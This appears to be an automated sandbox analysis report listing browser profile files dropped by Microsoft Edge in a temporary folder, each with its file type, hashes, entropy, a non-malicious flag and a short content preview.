                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):267
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.30148635744433
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kcAdD1923fQyS/Hrl2KLlmcy2v4q2P923fQyS/HrK+IFUv:BxuLpX4v4F3FUv
                                                                                                                                                                                                                                                                                                              MD5:C4D9994C8D9241EE10125CD4D50201CC
                                                                                                                                                                                                                                                                                                              SHA1:57CD595AC8B6A3446401DB32331F02E1BA6530B4
                                                                                                                                                                                                                                                                                                              SHA-256:DAA35A83A998D8D1DC5F90FBE14BA475F5C7BB368F4652AFEC921127581579B9
                                                                                                                                                                                                                                                                                                              SHA-512:4415B6D570F9E736A640B0F9D822B04645327A4E50A0AED138C691442C6A25D83C2D9CF134B6EEA9E31A680E917F991E468C3C7AAD1759B6DD296E274727FA22
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:54.030 19b0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db since it was missing..2024/12/22-17:54:54.064 19b0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):126
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6057778868597197
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:G0XttkJcsRwI9tkJcscml9t3moiOlfmEan:G0Xtqcsqc9Ct3mxKm9n
                                                                                                                                                                                                                                                                                                              MD5:1988A95FC23D528F1C8C4B5CE0065954
                                                                                                                                                                                                                                                                                                              SHA1:C627C94BD48A0B7198EEEB4677C432A5D4BCAD3D
                                                                                                                                                                                                                                                                                                              SHA-256:49A74FC61937AD2EFDFD44E61A392790457C2CEDC5AA5BF21DFC867AAB8DD25F
                                                                                                                                                                                                                                                                                                              SHA-512:D6C03BE1480D6A2FFC875053EDABBC29C3431CD1A61E0C16613F2FA58E35B4949F7D7A286D77464677C776AB2AA19489BC0E51A2022B1CFEDF67B2CB86319CE8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.261907843853779
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kLd1FD1923fQyS/Hrzs52KLlm7vF34q2P923fQyS/HrzAdIFUv:sv8N9LYvN4v4iFUv
                                                                                                                                                                                                                                                                                                              MD5:DADA2D994D162685C9C77F96EFF1B6D8
                                                                                                                                                                                                                                                                                                              SHA1:F8252766A6181651D75A0677B4699C5F2CFCA2A3
                                                                                                                                                                                                                                                                                                              SHA-256:9222B2F352068DE8FA6A687C2E8F0206BCA4C914B5EFF912AEF39A06E44FA761
                                                                                                                                                                                                                                                                                                              SHA-512:832FCF2E82B36F1CBA366D18A46BDC0126D0744CE7856F8C794CF3A48F51AC530D5D2E2D82C9F8841649CB1D6E087170428BF56432C1C6220739FCA99B352239
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:53.750 19b0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata since it was missing..2024/12/22-17:54:53.970 19b0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Last Version

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Local State (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1371
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529436301618216
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtLkMbFPB6Fr6yik9JdXBuBuwBFayPnNhR+XcQQQRCYfYg:YuBqDPafWMbFPTUgBzBFDPzR+sFB0
                                                                                                                                                                                                                                                                                                              MD5:B15A20CBDC1E4DAC9EABEB4E7F63F840
                                                                                                                                                                                                                                                                                                              SHA1:1CA549A63831F0B1015A4F3100CBDD57BC194CC5
                                                                                                                                                                                                                                                                                                              SHA-256:B4A340E11B8DC9FA9EA5FD8EDDDEFF4FD9032551719764C2A82E40CF930BE91E
                                                                                                                                                                                                                                                                                                              SHA-512:93E14403555ECEA53E4B1263E7A416D63D65827ADD036381AE98D4222381FD7ADABB2514B555E855AEC244F694E5A3726BDC0EC073AB5D4702827D6D85672BC6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl3vRJw=="},"profile":{"info_cache":{},"profile_counts_reported":"13379381692285050","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734908090"},"user_experienc

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Local State~RF4bf83.TMP (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1371
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529436301618216
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtLkMbFPB6Fr6yik9JdXBuBuwBFayPnNhR+XcQQQRCYfYg:YuBqDPafWMbFPTUgBzBFDPzR+sFB0
                                                                                                                                                                                                                                                                                                              MD5:B15A20CBDC1E4DAC9EABEB4E7F63F840
                                                                                                                                                                                                                                                                                                              SHA1:1CA549A63831F0B1015A4F3100CBDD57BC194CC5
                                                                                                                                                                                                                                                                                                              SHA-256:B4A340E11B8DC9FA9EA5FD8EDDDEFF4FD9032551719764C2A82E40CF930BE91E
                                                                                                                                                                                                                                                                                                              SHA-512:93E14403555ECEA53E4B1263E7A416D63D65827ADD036381AE98D4222381FD7ADABB2514B555E855AEC244F694E5A3726BDC0EC073AB5D4702827D6D85672BC6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl3vRJw=="},"profile":{"info_cache":{},"profile_counts_reported":"13379381692285050","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734908090"},"user_experienc

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Local State~RF4bfb2.TMP (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1371
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529436301618216
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtLkMbFPB6Fr6yik9JdXBuBuwBFayPnNhR+XcQQQRCYfYg:YuBqDPafWMbFPTUgBzBFDPzR+sFB0
                                                                                                                                                                                                                                                                                                              MD5:B15A20CBDC1E4DAC9EABEB4E7F63F840
                                                                                                                                                                                                                                                                                                              SHA1:1CA549A63831F0B1015A4F3100CBDD57BC194CC5
                                                                                                                                                                                                                                                                                                              SHA-256:B4A340E11B8DC9FA9EA5FD8EDDDEFF4FD9032551719764C2A82E40CF930BE91E
                                                                                                                                                                                                                                                                                                              SHA-512:93E14403555ECEA53E4B1263E7A416D63D65827ADD036381AE98D4222381FD7ADABB2514B555E855AEC244F694E5A3726BDC0EC073AB5D4702827D6D85672BC6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl3vRJw=="},"profile":{"info_cache":{},"profile_counts_reported":"13379381692285050","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734908090"},"user_experienc

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\ShaderCache\index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                                              Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNlhtKX:Ls3O
                                                                                                                                                                                                                                                                                                              MD5:7C797D38C5CFE6DBBB45ECFB06CA9797
                                                                                                                                                                                                                                                                                                              SHA1:8ECF296AECDE5B118ABF971CFEB68C40B333BC28
                                                                                                                                                                                                                                                                                                              SHA-256:AFFD012195F40FB7C69C4F4DF9DBF257A64AF0774E11295F299C796261C2E1CE
                                                                                                                                                                                                                                                                                                              SHA-512:F70EC5272018CCD61B3FC5904C7DAC8E3BBC0B214AD4475FB3FA44AA0DF148577190DF8D0F16519CC9D52601463C585D43E2E3D3739ABDDC9A3D413459A3104F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................5./.z./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                                                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:customSynchronousLookupUris_0

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):35302
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):18
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5724312513221195
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                                                                                                                                                                              MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                                                                                                                                                                              SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                                                                                                                                                                              SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                                                                                                                                                                              SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-0

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3581
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.459693941095613
